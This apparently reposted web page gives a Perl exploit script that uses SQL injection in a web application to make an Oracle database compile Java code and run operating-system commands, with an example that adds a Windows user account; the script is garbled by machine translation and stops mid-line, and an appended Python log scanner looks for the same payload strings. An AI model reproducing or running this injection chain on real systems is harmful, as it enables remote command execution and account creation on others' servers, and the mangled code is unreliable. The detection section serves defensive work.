Run system commands through Oracle Injection

Source: Internet
Author: User

Baishen blog

Two articles about this:

 

http://www.bkjia.com/Article/200810/30019.html


http://www.red-database-security... nds_via_webapp.html

 


CODE:

#!/usr/bin/env perl
use LWP::Simple;

print "-----------------------------------------------------------------------";
print "Oracle command execution via web apps ";
print "sid-at-NotSoSecure // www.notsosecure.com ";
print "suported versions <= 10.2.0.2, all platforms ";
print "------------------------------------------------------------------------";

if (@ARGV < 2)
{
    print "Usage :";
    print "ora_cmd_exec.pl <URL> <cmd-to-exec> ";
    print "";
    print "EXAMPLE: ./ora_rj_exec.pl \"http://192.168.172.129:81/ora3.php?Name=s\" \"net user notsosecure n0tsos3cur3/add\"";
    print "EXAMPLE: ./ora_rj_exec.pl \"http://192.168.172.129:81/ora3.php?Id=100\" \"net user notsosecure n0tsos3cur3/add\"";
    print "------------------------------------------------------------------------";

    exit();
}

My $ url_1 = $ ARGV [0]. "and 1 = ";
My $ javalib = "(select SYS. DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (FOO, BAR, DBMS_OUTPUT". PUT (: P1); EXECUTE IMMEDIATE
Declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace and compile java source named
"LinxUtil" as import java. io. *; public class LinxUtil extends Object {public static String runCMD (String args)
{Try {BufferedReader myReader = new BufferedReader (new InputStreamReader (runtime.getruntime(.exe c (args). getInputStream ()
); String stemp, str = ""; while (stemp = myReader. readLine ())! = Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return
Str;} catch (Exception e) {return e. toString () ;}} public static String readFile (String filename) {try {BufferedReader
MyReader = new BufferedReader (new FileReader (filename); String stemp, str = ""; while (stemp = myReader. readLine ())! =
Null) str % 2b = stemp % 2b "\ n"; myReader. close (); return str;} catch (Exception e) {return
E. toString () ;}}; END; --, SYS, 0) from dual )--";

My $ javaperm = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate begin dbms_java.grant_permission (
PUBLIC, SYS: java. io. FilePermission, <>, execute); end; END; --, SYS, 0, 1) from dual )--";

My $ export _exec_func = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate create or replace function
LinxRunCMD (p_cmd in varchar2) return varchar2 as language java name LinxUtil. runCMD (java. lang. string) return String; END; --, SYS, 0, 1) from dual )--";

My $ export _exec_func_priv = "(select SYS. Values (FOO, BAR, DBMS_OUTPUT". PUT (: P1); execute immediate declare pragma AUTONOMOUS_TRANSACTION; begin execute immediate grant all on LinxRunCMD
To public; END; --, SYS, 0, 0) from dual )--";

My $1__1 = $ ARGV [1];
My $ cmd_exec = "(select sys.LinxRunCMD(cmd.exe/c". $ cmd_1. ") from dual )--";

print "Step 1. Creating Java Library ...";
print "--------------------------------";
my $url = $url_1 . $javalib;
my $content = get $url;
die "Couldnt get $url" unless defined $content;


if ($content =~ m/warning/i) {
    print "-----------------------------------------------";
    print "ERROR at STAGE 1 occured !!!... Did you provide me the URL in the format, I want ?? ";
    print "-----------------------------------------------";
} else {
    print "NO errors encountered... proceeding to step... 2 ";
    print "--------------------------------";

    # print $content;
}

#-----------------------
print "Step 2. granting java execute privileges ...";
my $url = $url_1 . $javaperm;
my $content = get $url;
die "Couldnt get $url" unless defined $content;


if ($content =~ m/warning/i) {
    print "-----------------------------------------------";
    print "ERROR at STAGE 2 occured !!!... Something was not right ..";
    print "-----------------------------------------------";
    print "I will proceed, however, there is a possibility that the attack will fail ";
} else {
    print "NO errors encountered... proceeding to step... 3 ";
    print "--------------------------------";

    # print $content;
}

#-----------------------
print "Step 3. creating funtion for command execution ...";
my $url = $url_1 . $pai_exec_func;
my $content = get $url;
die "Couldnt get $url" unless defined $content;


if ($content =~ m/warning/i) {
    print "-----------------------------------------------";
    print "ERROR at STAGE 3 occured !!!... Something was not right ..";
    print "-----------------------------------------------";
    print "I will proceed, however, there is a possibility that the attack will fail ";
} else {
    print "NO errors encountered... proceeding to step... 4 ";
    print "--------------------------------";

    # print $content;
}

#-----------------------
print "Step 4. making function executable by all users ...";
my $url = $url_1 . $pai_exec_func_priv;
my $content = get $url;
die "Couldnt get $url" unless defined $content;


if ($content =~ m/warning/i) {
    print "-----------------------------------------------";
    print "ERROR at STAGE 4 occured !!!... Something was not right ..";
    print "-----------------------------------------------";
    print "I will proceed, however, there is a possibility that the attack will fail ";
} else {
    print "NO errors encountered... proceeding to step... 5 ";
    print "--------------------------------";

    # print $content;
}

#-----------------------
print "Step 5. RIGHT !!!, By now we should have a function sys.LinxRunCMD through which we can execute commands ...";
print "--------------------------------";
print "You should be able to execute this function as: select sys.LinxRunCMD(cmd.exe/c net user notsosecure n0ts3cur3/add) from dual ";
print "I will execute the command you told me to execute... you wont be able to see the output though :(";
my $url = $url_1 . $pai_exec;
my $content = get $url;
die "Couldnt get $url" unless defined $content;


if ($content =~ m/warning/i) {
    print "-----------------------------------------------";
    print "ERROR at STAGE 5 occured !!!
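
Added example, not part of the script above or of the original page: a Python scanner for web access logs that flags the strings the five stages send in the query string (the DBMS_EXPORT_EXTENSION wrapper, the autonomous transaction, the Java source and permission grant, and the LinxRunCMD call). The log lines are constructed with payload bodies redacted, and the marker labels and the `normalise`/`scan` helpers are names chosen for this example.

```python
import re
from urllib.parse import unquote_plus

# Strings the script above sends in its five requests. LinxUtil/LinxRunCMD are
# only that script's default names, so treat a hit on them as a bonus signal.
STAGE_MARKERS = {
    "plsql-injection-wrapper": r"dbms_export_extension|get_domain_index_tables",
    "autonomous-transaction": r"pragma\s+autonomous_transaction",
    "java-source-creation": r"create\s+or\s+replace\s+and\s+compile\s+java\s+source",
    "java-permission-grant": r"dbms_java\s*\.\s*grant_permission",
    "java-call-spec": r"as\s+language\s+java\s+name",
    "command-wrapper-call": r"linxruncmd|linxutil",
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def normalise(raw, rounds=3):
    """Undo up to `rounds` layers of URL encoding, drop /* */ comments, fold whitespace."""
    text = raw
    for _ in range(rounds):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    text = re.sub(r"/\*.*?\*/", " ", text, flags=re.S)
    return re.sub(r"\s+", " ", text).lower()

def scan(lines):
    """Map client address -> sorted marker names seen in its query strings."""
    hits = {}
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = normalise(target.partition("?")[2])
        found = {n for n, rx in STAGE_MARKERS.items() if re.search(rx, query)}
        if found:
            hits.setdefault(client, set()).update(found)
    return {ip: sorted(names) for ip, names in hits.items()}

# Constructed access-log lines (combined format); payload bodies are redacted.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /ora3.php?id=100 HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /ora3.php?id=100+and+1=(select+SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(REDACTED)+from+dual)-- HTTP/1.1" 200 0',
    '203.0.113.9 - - [01/Jan/2024:10:00:06 +0000] "GET /ora3.php?id=100+and+1=(REDACTED+pragma/**/AUTONOMOUS_TRANSACTION+REDACTED+%2564bms_java.grant_permission(REDACTED))-- HTTP/1.1" 200 0',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /ora3.php?name=s+and+1=(select+sys.LinxRunCMD(REDACTED)+from+dual)-- HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for ip, names in scan(SAMPLE_LOG).items():
        print(ip, names)
```

The scanner only sees what reaches the access log, so requests sent in a POST body need the same markers applied at a WAF or in database auditing.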
